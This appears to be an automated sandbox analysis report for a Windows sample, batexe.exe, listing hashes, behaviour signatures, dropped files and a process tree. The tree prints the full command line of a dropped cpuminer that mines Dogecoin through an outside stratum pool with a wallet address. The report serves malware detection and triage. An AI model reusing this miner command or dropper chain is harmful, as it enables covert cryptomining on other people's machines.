Analysis

  • max time kernel
    294s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    24-02-2024 04:56

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Users\Admin\AppData\Local\Temp\7E86.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\7E86.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7E86.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1640
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8155.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3908

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7E86.tmp\b2e.exe

    Filesize

    832KB

    MD5

    e1bd95ac3f9c6ce43914de2a53967fee

    SHA1

    3e03982c075df051d5a8dd837f42873f30483faf

    SHA256

    45c3475b58fbaa942be0297167c5c3fbbfe7295aa3fcbb4fb61df1348f55c550

    SHA512

    2166424e86301bbe04fbcce5d0b91562248845c5b1a7e889fee9a95d1c872dd6ea5cc85792b54e6d085095339be2f2b7f30cfd9b40a071b51c96a5009cc96f00

  • C:\Users\Admin\AppData\Local\Temp\7E86.tmp\b2e.exe

    Filesize

    640KB

    MD5

    ec807089447cc8ffed3ed14af8e0dd7f

    SHA1

    0d5600b96cd4d605dd40d169bade90cc2e41d4e0

    SHA256

    97789e181648b41de38dee9a0b40452bac36d463329a87bd2ad517a2968c51f1

    SHA512

    a2f87f33cd02f225b4c43f4dbd93e18e15e49dc5cdc1ef05f99bb54cdf2b759932d84e29863c11eb1941fb82d559682ea1be25ab7c826670389fb659d6afdac9

  • C:\Users\Admin\AppData\Local\Temp\8155.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.6MB

    MD5

    e9612eafd6d0dfe8e0e54ac8b089e9e5

    SHA1

    973175a160735d1edc4a2af5000830c46e8beffc

    SHA256

    71fce76d62d4be31640b5179b9e4da2cc8913f8d4ba052c105491e4c9dfc18d8

    SHA512

    01184bc0660dc98ac1a8c574eb83be8b1677cd82fe3684ca603fd85a7d47202f9af8c618e1459e7b29ca34b0e8053d1a8370356a1096323ab7448b1a14421287

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.6MB

    MD5

    1feecead6d894663ec4a5f76b4668986

    SHA1

    3b27b13a060fa916566cbe0078fd02fcd6187cf1

    SHA256

    d2f8ab31613987ac0c24ff419a900af23b12449471a9e1d80d35bac4823a88f6

    SHA512

    01011acbc4964b9cfdecdee79b2dfb2ebeb0bfcddd63affb2f2c780a933d5f4ffda6b6939d2a51c7e597d7dfd4892c96ea242ef08cf78f385c420793a30390be

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1.5MB

    MD5

    84bbc959d983ac56239ca76c4bb155b9

    SHA1

    acbd076a88eceea57c4b71088bb09eee8ac92241

    SHA256

    5475256871d3ef76fe5596de3bbe756206d340d36550d3fb0b59cd5e60c95943

    SHA512

    38e84f3b3ada2909c1e395ae4c5a2587fc6a92d96ebaa4ee8bafd79b245ae4efc52216d10de54a2a369d752e1d270026a3f98e4e95e3b0570ea24f54d9169156

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    7cf672bee2afba2dcd0c031ff985958e

    SHA1

    6b82a205db080ffdcb4a4470fce85a14413f3217

    SHA256

    c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

    SHA512

    3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1.4MB

    MD5

    c5b7aa64c2448a83a271b9975dc17958

    SHA1

    78852bcde51f2d61086742d44163f0764e846a82

    SHA256

    5f5ebffbbe7e5469417707518f49a6add4fad18a5d95f2cbe2a658cea34ab6ce

    SHA512

    7909bccab40c3583f4b176bc66119cd5ef2a3267b0f22e59131ed44971e7326b2ee2c91c53c0b4ebcdc8816c298fee53776b992442c91e96022bbd690b7cd23b

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1.6MB

    MD5

    90d12b11f77093ebd8339cf0ea17f577

    SHA1

    3ab70826f37285dbc1ea4a75a06906607fb02b32

    SHA256

    9a06d500e9345d803a75a9f7f471f06e403dd1d83f0cc6520c565a54ed0e9d64

    SHA512

    fa3b6331f136c23f6c8d3d4ab429de01f99319741fa3ef95439b4bd72de57d3b83ee99cad93b456e570d404c65096df738b50071bf4abb847e119c5ad81f6b05

  • memory/1640-4-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1640-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3032-5-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/3908-43-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3908-42-0x0000000051BB0000-0x0000000051C48000-memory.dmp

    Filesize

    608KB

  • memory/3908-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3908-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

    Filesize

    24.7MB

  • memory/3908-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3908-51-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3908-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3908-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3908-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3908-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3908-96-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB